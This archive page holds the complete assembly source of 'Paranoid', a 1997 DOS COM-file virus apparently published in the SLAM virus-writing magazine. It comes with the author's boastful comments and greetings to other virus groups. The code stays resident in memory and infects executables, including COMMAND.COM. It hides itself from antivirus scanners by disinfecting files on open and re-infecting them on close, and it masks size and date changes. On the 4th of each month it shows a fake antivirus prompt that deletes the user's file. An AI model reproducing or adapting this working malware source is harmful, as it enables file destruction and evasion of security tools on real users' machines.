HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / VIRDCOLL.ZIP / PARANOID.ZIP / PARANOID.ASM next >

Wrap

Assembly Source File | 1997-07-09 | 18.3 KB | 689 lines

; ; ┌───≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡───┐ ; │ ≈Paranoid≈ │ ; │ │ ; │ written by Virtual Daemon for SLAM 1997 issue #3 │ ; └───≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡───┘ ; ; » TSR: [√] ; » COM: [√] ; » EXE: [ ] ; » BS/MBR: [ ] ; ; Description: ; ──────────── ; - infect files on 4bh (load or execute), 3eh (close) and 4301h (set attr) ; ─ desinfect files on 3dh (open) and 6c00h (extended open) ; ─ size stealth on 11h/12h/4eh/4fh (find 1st/next FCB/DTA) ; - time stealth on 5700h (get file date/time) ; - restore file time/date/attributes ; - infect read-only files ; - Int 24h handler ; - infect COMMAND.COM ; - cool payload on the 4th day of the month! :) ; - F-Prot, AVP, Toolkit, McAffe SCAN, etc... can't find a shit if the ; virus is active in memory... hehehe! :) ; ; Well, I made this virus for the 3rd issue of SLAM Magazine. It's a full ; stealth COM infector (I haven't got the time to do it for EXE's too :( ). ; The virus will desinfect on file open and re-infect on close. Besides that, ; it will infect on 4bh (load or execute) and on 4301h (set file attributes). ; The virus has also some size stealth features... this way, it will not report ; any size increase during find first/next functions. All this "functions" ; makes 'Paranoid' a pretty good infector. I've tested it with F-Prot 2.27, ; AVP, Dr.Solomon's Toolkit, AidsTest, McAfee Scan and others and NONE of them ; can trace it. That's bcoz when the AV's are trying to open the file, I ; desinfect it so they wont find shit, and when they're trying to close it, I ; will re-infect it... heheh... ; Anyway, this is not a cool technical virus, and I know that there are ; plenty elites virus coders who already know how to make a shit like this. ; Anyway, for those who don't: here's a chance for you to learn! ; The payload? Hehehe... Well, I like this one! Do U guys remember the old ; CPAV anti-virus system? It had an "immunize" option which could insert a ; code in an executable file. If the file was being modified in any way, the ; code gived the chance for the file to be restored. Ok... This is what ; Paranoid do: on the 4th day of the month (I was born on 4 september) it ; will activate a little code. It will appear the same shit words and options ; like CPAV's shit. So, the user will have 3 options: one to exit to DOS, one ; to continue the programs execution and the 3rd to recover the file. Of course, ; the majority of users (they're all LAMERS!) will choose the 3rd one...hehehe ; hehehe... but instead of recovering the virus will delete the file! :-)) ; Maybe for some of you, this payload sucks... well, I like it, and there's ; nothing you can do about it! ;-) ; I didn't include an encryption system for 2 reasons: ; 1) if the virus is active, no lamer can see the virus bcoz we're full stealth ; 2) if a lamer will boot from a clean disk and will look at the file, he will ; see most of the virus looking like the CPAV anti-virus protection (all the ; strings from the end are exactly the same) ; ; One last thing: the name of the virus come from a song of Green Day band ; called "Basket Case"! Green Day is one of my favourite bands so I think that ; this virus is dedicated to them! Love ya' guys! :) ; ; ─═══════════════════════════════════─ ; Sometimes I give myself the CREEPS ; Sometimes my mind plays tricks on me ; It all keeps adding up ; I think I'm CRACKING UP ; Am I just ≈PARANOID≈? ; Am I just STONED ; ( Green Day ) ; ─═════════════════════════─ ; ; Greetz goes out to: -all the SLAM ppl (NJ, Hyperlock, Cyborg, DarkSide, ; AuroDreph, Stealth Warrior, Dark Chakal, Death Knight ; LON, l0nerider and Cursor) ; -MrSandman and the entire 29A crew: guys you're great! ; Love ya' all! ;) ; -all the ppl from IRC on channel #virus: see ya soon! ; -Yosha, Casio, Pockets: see ya soon on undernet! ; -IR/G and Stealth: you're all elites! keep up the work! ; -Quantum, Metabolis and the old VLAD crew: you were ; the BEST group from this earth, universe etc... ;-)) ; -Neophyte: come back brother! :'( ; -and to all others that I forgot right now ; .model tiny .code org 0 begin: call start start: pop bp sub bp,offset start ;get delta offset push ds push es mov ax,'VD' ;check if already installed int 21h cmp bx,':)' je complete ;don't install if already installed mov ah,4ah mov bx,0ffffh int 21h sub bx,(endheap-begin+15)/16+1 mov ah,4ah int 21h jc complete sub word ptr ds:[2],(endheap-begin+15)/16+1 mov ah,48h mov bx,(endheap-begin+15)/16 int 21h jc complete push ax pop es dec ax push ax pop ds xor di,di ;F-Prot won't detect anything in memory! ;) mov al,'Z' mov byte ptr ds:[di],al mov ax,8 mov word ptr ds:[di+1],ax push cs ;DS=CS pop ds xor di,di mov cx,(heap-begin)/2+1 mov si,bp rep movsw ;load the virus in memory xor ax,ax mov ds,ax push ds lds ax,ds:[21h*4] ;save Int 21h vector mov word ptr es:oldint21,ax mov word ptr es:oldint21+2,ds pop ds mov word ptr ds:[21h*4],offset new21 ;put our Int 21h handler mov ds:[21h*4+2],es complete: pop es pop ds lea si,[bp+offset jumpbuf] ;restore saved bytes mov di,100h push di movsw ;move a word movsb ; and a byte => 3 bytes (size of JMP) retn ;return to host new24: mov al,3 iret new21: cmp ax,'VD' ;install? jne continue mov bx,':)' iret virus_name db '·PARANOID·' ;Yeah! This is the best part! ;) signature db '[VD/SLAM]' continue: cmp ah,4bh ;load or execute? jne fuck jmp infect fuck: cmp ax,4301h ;set new attributes? jne megafuck jmp infect megafuck: cmp ah,3eh ;close file? jne gigafuck jmp close_infect gigafuck: cmp ah,3dh ;open file? jne terrafuck jmp desinfect terrafuck: cmp ax,6c00h ;extended open? jne mgtfuck jmp extended mgtfuck: cmp ah,11h ;find 1st FCB? je FCB_stealth cmp ah,12h ;find next FCB? je FCB_stealth cmp ah,4eh ;find 1st DTA? je DTA_stealth cmp ah,4fh ;find next DTA? je DTA_stealth cmp ax,5700h ;get file time/date? jne exithandler jmp time_stealth exithandler: db 0eah ;return to original Int21h oldint21 dd ? FCB_stealth: pushf push cs call exithandler ;get the FCB dude! ;-) or al,0 ;hmmm... errors? DID anyone SAID errors? ;) jnz skip_dir ;wow! megashit! :( We must return... push ax bx es mov ah,51h ;get the PSP int 21h mov es,bx cmp bx,es:[16h] ;check if it's a DIR call jnz error mov bx,dx ;get FCB offset mov al,[bx] ;al=drive push ax mov ah,2fh ;get DTA int 21h pop ax inc al jnz no_ext add bx,7 ;Extended FCB? Okie, dokie... bx=bx+7 no_ext: cmp word ptr es:[bx+1fh],0 ;check if bigger jnz error mov ax,es:[bx+19h] cmp ah,100 ;infected? jb error ;nope! :( ror ah,1 ;substract 100 years sub ah,100 rol ah,1 mov es:[bx+19h],ax ;put back the new value sub word ptr es:[bx+1dh],(heap-begin) ;do some stealth around here! :) error: pop es bx ax skip_dir: retf 2 DTA_stealth: pushf push cs call exithandler jc no_files ;errors? I HATE errors... :( pushf push ax di es bx mov ah,2fh ;get DTA int 21h mov ax,es:[bx+18h] cmp ah,100 ;infected? jb not_inf ;nope... :( cmp word ptr es:[bx+1ah],(heap-begin) ja hide cmp word ptr es:[bx+1Ch],0 je not_inf hide: ror ah,1 ;"adjust" the years... sub ah,100 rol ah,1 mov es:[bx+18h],ax sub word ptr es:[bx+1ah],(heap-begin) ;cut size not_inf: pop bx es di ax popf no_files: retf 2 time_stealth: pushf call dword ptr cs:[oldint21] jc shit cmp dh,100 ;check if infected jb no_way ror dh,1 ;make it look "younger" with a century sub dh,100 rol dh,1 no_way: iret shit: retf 2 extended: cmp dx,1 je yeah jmp exithandler yeah: mov ah,3dh mov al,bl mov dx,si ;get the file's name in ds:dx mov byte ptr ashit,1 ;mark as an extended call desinfect: push ax bx cx dx di si ds es push ds pop es ;ES=DS mov cx,64 ;PATH+file name=65 (max) mov di,dx mov al,'.' ;search till '.' found repne scasb ;repeat till cx=0 cmp word ptr ds:[di],'oc' ;check if extension is com or COM je stepcomplete cmp word ptr ds:[di],'OC' jne other_shit ;not a COM/com file stepcomplete: cmp byte ptr ds:[di+2],'m' je openfile cmp byte ptr ds:[di+2],'M' je openfile other_shit: jmp goaway openfile: mov ax,4300h ;get old attributes int 21h push cx push dx push ds mov ax,4301h ;set new ones xor cx,cx pushf ;use a fake int 21h call, bcoz else we will call dword ptr cs:[oldint21] ;enter in an infinite loop mov ax,3d02h ;open file RW pushf call dword ptr cs:[oldint21] xchg bx,ax push cs cs pop ds es ;CS=DS=ES mov ax,5700h ;get time pushf call dword ptr cs:[oldint21] mov ax,dx cmp ah,100 ;check if infected jnb us jmp close_dis ;if not equal then don't stealth us: mov word ptr cs:[file_time],cx mov word ptr cs:[file_date],dx read_f4: mov ah,3fh ;read the 1st 3 bytes mov cx,3 lea dx,buffer pushf call dword ptr cs:[oldint21] chk_markers: cmp byte ptr buffer,0e9h ;check if it is a jmp. jne close_dis ;not equal? then it's not infected!?! mov ax,4202h ;go to EOF xor cx,cx cwd int 21h mov dx,ax ;save file size push dx mov cx,word ptr buffer+1 ;check if infected add cx,(heap-begin)+3 cmp ax,cx jne close_dis sub dx,(heap-jumpbuf) ;go to where the JMP bytes are stored xor cx,cx mov ax,4200h int 21h mov ah,3fh ;read the original bytes in memory mov cx,3 lea dx,buffer pushf call dword ptr cs:[oldint21] mov ax,4200h ;go to BOF xor cx,cx cwd int 21h mov ah,40h ;write the original code lea dx,buffer mov cx,3 pushf call dword ptr cs:[oldint21] pop dx ;restore file size sub dx,(heap-begin) ;substract the length of our virus mov ax,4200h xor cx,cx int 21h mov ah,40h ;truncate the file xor cx,cx pushf call dword ptr cs:[oldint21] close_dis: mov ax,5701h mov cx,word ptr cs:[file_time] mov dx,word ptr cs:[file_date] ror ah,1 ;restore original year sub ah,100 rol ah,1 pushf call dword ptr cs:[oldint21] mov ah,3eh ;close the phile pushf call dword ptr cs:[oldint21] mov ax,4301h ;restore attributes pop ds pop dx pop cx pushf call dword ptr cs:[oldint21] goaway: pop es ds si di dx cx bx ax cmp byte ptr ashit,1 ;check if was an extended open jne notex ;nope mov ax,6c00h ;set ax to 6c00h mov dx,1 ;set dx to 1 mov byte ptr ashit,0 ;set the check variable to 0 notex: jmp exithandler jumpbuf db 0cdh,20h,0 infect: push ax bx cx dx si di ds es push ds push dx mov byte ptr cs:[sclose],0 ;set the infect checking variable to 0 yoyo_check: ;it's payload time! hehehe... ;) mov ah,2ah int 21h cmp dl,4 je yep jmp nope yep: push cs pop ds mov ah,9h lea dx,yooo int 21h ag: mov ah,0eh ;this make that funny noise mov al,07h xor bh,bh int 10h mov ah,1 int 21h or al,32 ;check for both upper and lower cases cmp al,'e' ;do some checking je okie cmp al,'c' je nope cmp al,'r' je np mov ah,2 mov dl,8 int 21h jmp ag np: mov ah,41h ;wrong answer? delete the phile... heheh. :) pop dx pop ds int 21h jc okie push cs pop ds mov ah,9h lea dx,U_out int 21h okie: push cs pop ds mov ah,9h lea dx,crlf int 21h mov ah,4ch ;forced exit to DOS int 21h nope: mov ax,3524h ;save Int 24h vector int 21h mov word ptr cs:[old_int24],bx mov word ptr cs:[old_int24+2],es push cs pop ds lea dx,new24 ;set a new Int 24h handler mov ax,2524h int 21h pop dx pop ds mov ax,4300h ;get file attributes int 21h push ds push dx push cx mov ax,4301h ;set new attributes (archive only) xor cx,cx pushf call dword ptr cs:[oldint21] mov ax,3d02h ;open the file RW pushf call dword ptr cs:[oldint21] xchg ax,bx infect_close: mov ax,5700h ;get file's date/time pushf call dword ptr cs:[oldint21] mov ax,dx cmp ah,100 ;check if infected jb shita jmp close_file ;infected? close the file shita: mov word ptr cs:[file_time],cx mov word ptr cs:[file_date],dx push cs cs ;CS=DS=ES pop ds es mov ah,3fh ;read from file the first 3 bytes lea dx,buffer ;save them into our buffer mov cx,3 pushf call dword ptr cs:[oldint21] mov ax,4202h ;go to EOF xor cx,cx cwd pushf call dword ptr cs:[oldint21] mov word ptr file_size,ax mov word ptr file_size+2,dx cmp word ptr buffer,'MZ' ;check if EXE je close_file cmp word ptr buffer,'ZM' je close_file mov ax,word ptr file_size ;check if too big cmp ax,65535-(endheap-begin) ja close_file cmp ax,(endheap-begin) ;check if too small jbe close_file mov cx,word ptr buffer+1 ;check if already infected add cx,heap-begin+3 cmp ax,cx je close_file mov di,offset jumpbuf ;prepare new JMP mov si,offset buffer movsb movsw mov byte ptr [offset buffer],0e9h sub ax,3 mov word ptr [offset buffer+1],ax mov ah,40h ;write the virus to host lea dx,begin mov cx,heap-begin int 21h mov ax,4200h ;go to BOF xor cx,cx cwd pushf call dword ptr cs:[oldint21] mov ah,40h ;write the new JMP lea dx,buffer mov cx,3 pushf call dword ptr cs:[oldint21] mov ax,5701h ;set old file's time/date mov cx,word ptr cs:[file_time] mov dx,word ptr cs:[file_date] ror dh,1 ;mark the file for stealth add dh,100 rol dh,1 pushf call dword ptr cs:[oldint21] close_file: cmp byte ptr cs:[sclose],1 ;check if it's a close request or a infect je out_of_here ;close? hmmm... ok! mov ah,3eh ;close the file pushf call dword ptr cs:[oldint21] mov ax,4301h ;set old attributes pop cx pop dx pop ds pushf call dword ptr cs:[oldint21] mov ds,word ptr cs:[old_int24+2] mov dx,word ptr cs:[old_int24] mov ax,2524h ;restore the Int 24h handler int 21h out_of_here: mov byte ptr cs:[sclose],0 ;reset variable to 0 exit: pop es ds si di dx cx bx ax goback: jmp exithandler close_infect: cmp bx,4 ;check if AUX/NULL/CON jbe goback push ax bx cx dx di si ds es push bx mov ax,1220h int 2fh mov ax,1216h ;use SFT to get the extension mov bl,byte ptr es:[di] int 2fh pop bx add di,40 ;di points to extension cmp word ptr es:[di],'OC' ;check if it's a COM file jne close_it cmp word ptr es:[di+2],'M' jne close_it mov byte ptr es:[di-26h],2 ;mark file as open in RW mode mov ax,4200h xor cx,cx cwd int 21h mov byte ptr cs:[sclose],1 ;mark it as a close request jmp infect_close close_it: jmp short exit U_out db 0dh,0ah,'Wrong choice sucker! hehehe... ;-)','$' crlf db 0dh,0ah,'$' yooo db 'Central Point Anti-Virus (c) 1993 CPS',0dh,0ah db 'Self Integrity Check warning - File was changed !',0dh,0ah db 'Choose an option:',0dh,0ah db '[R] Self Reconstruction.',0dh,0ah db '[C] Continue execution.',0dh,0ah db '[E] Exit to DOS.',0dh,0ah db 'Press R,C or E:$' old_int24 dd ? heap: file_size dd ? file_time dw ? file_date dw ? sclose db 0 ashit db ? buffer db 3 dup (?) endheap: end begin